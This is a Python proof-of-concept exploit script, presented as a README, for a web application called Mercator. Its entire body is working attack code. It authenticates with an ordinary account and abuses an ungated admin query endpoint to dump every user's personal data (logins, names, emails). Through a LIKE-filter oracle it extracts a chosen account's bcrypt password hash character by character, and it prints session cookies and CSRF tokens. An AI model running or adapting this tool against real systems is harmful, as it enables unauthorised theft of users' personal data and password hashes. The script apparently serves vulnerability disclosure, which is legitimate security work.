README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Mercator Query Engine extraction tool.
Reads arbitrary models through the ungated POST /admin/queries/execute
endpoint (QueryController::execute). Default action: enumerate every user
account with its PII (id, login, name, email, granularity).
./bin/python3 query_engine_dump.py --base http://127.0.0.1:8000 \
--user audit --password 'Audit123!'
Options:
--json emit JSON instead of a table
--extract-hash ID also recover the bcrypt password hash of account ID
(case-folded: the target column uses a CI collation)
"""
import argparse
import json
import re
import string
import sys
import warnings
# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")
import requests
import urllib3
urllib3.disable_warnings()
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
BCRYPT_ALPHABET = "$./" + string.digits + string.ascii_uppercase + string.ascii_lowercase
PII_FIELDS = ["id", "login", "name", "email", "granularity"]
# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────
def log(message):
"""Status banner — emitted on stderr so stdout stays pure result data."""
print(message, file=sys.stderr)
def die(message):
log(f"[!] {message}")
sys.exit(1)
def login(session, base, user, password):
"""Authenticate, print the login section, and return the CSRF token."""
r = session.get(f"{base}/login", timeout=10)
m = LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found on /login")
r = session.post(
f"{base}/login",
data={"_token": m.group(1), "login": user, "password": password},
timeout=10, allow_redirects=True,
)
if r.url.rstrip("/").endswith("/login"):
die(f"authentication failed for '{user}'")
m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
if not m:
die("CSRF token not found after login")
csrf = m.group(1)
log("[+] login")
log(f" user : {user}")
for c in session.cookies:
log(f" cookie : {c.name}={c.value}")
log(f" csrf token : {csrf}")
return csrf
# ── Query engine ────────────────────────────────────────────────────────────
def query(session, base, csrf, dsl):
"""Submit a DSL to the query engine and return the decoded JSON."""
r = session.post(
f"{base}/admin/queries/execute",
headers={"X-CSRF-TOKEN": csrf, "Accept": "application/json"},
data=dsl, timeout=15,
)
if r.status_code != 200:
die(f"/admin/queries/execute returned HTTP {r.status_code}")
return r.json()
def fetch_accounts(session, base, csrf):
"""Return every user account with its PII fields."""
data = query(session, base, csrf,
{"from": "users", "output": "list", "select[]": PII_FIELDS})
return data.get("rows", [])
def extract_hash(session, base, csrf, account_id):
"""Recover an account's bcrypt hash via the filter-side LIKE oracle."""
known = ""
while len(known) < 60:
match = None
for c in BCRYPT_ALPHABET:
dsl = {
"from": "users", "output": "list", "select[]": ["id"],
"filters[0][field]": "id",
"filters[0][operator]": "=",
"filters[0][value]": str(account_id),
"filters[1][field]": "password",
"filters[1][operator]": "like",
"filters[1][value]": known + c + "%",
}
if query(session, base, csrf, dsl)["meta"]["count"] >= 1:
match = c
break
if match is None:
break
known += match
return known
def render_table(accounts):
widths = {
f: max([len(f)] + [len(str(a.get(f, ""))) for a in accounts])
for f in PII_FIELDS
}
row = lambda values: " ".join(
str(v).ljust(widths[f]) for f, v in zip(PII_FIELDS, values)
)
print(row(PII_FIELDS))
print(" ".join("-" * widths[f] for f in PII_FIELDS))
for a in accounts:
print(row([a.get(f, "") for f in PII_FIELDS]))
def main():
ap = argparse.ArgumentParser(description="Mercator Query Engine extraction tool")
ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
ap.add_argument("--user", required=True, help="account login")
ap.add_argument("--password", required=True)
ap.add_argument("--json", action="store_true", help="emit JSON instead of a table")
ap.add_argument("--extract-hash", type=int, metavar="ID",
help="recover the bcrypt hash of account ID")
args = ap.parse_args()
session = requests.Session()
session.verify = False
csrf = login(session, args.base, args.user, args.password)
accounts = fetch_accounts(session, args.base, csrf)
log(f"[+] {len(accounts)} account(s) extracted from the users model")
if args.extract_hash is not None:
digest = extract_hash(session, args.base, csrf, args.extract_hash)
log(f"[+] account {args.extract_hash} password hash: {digest}")
for a in accounts:
if a.get("id") == args.extract_hash:
a["password_hash"] = digest
if args.json:
print(json.dumps(accounts, indent=2))
else:
render_table(accounts)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
die("interrupted")
except requests.RequestException as e:
die(f"could not reach Mercator: {e}")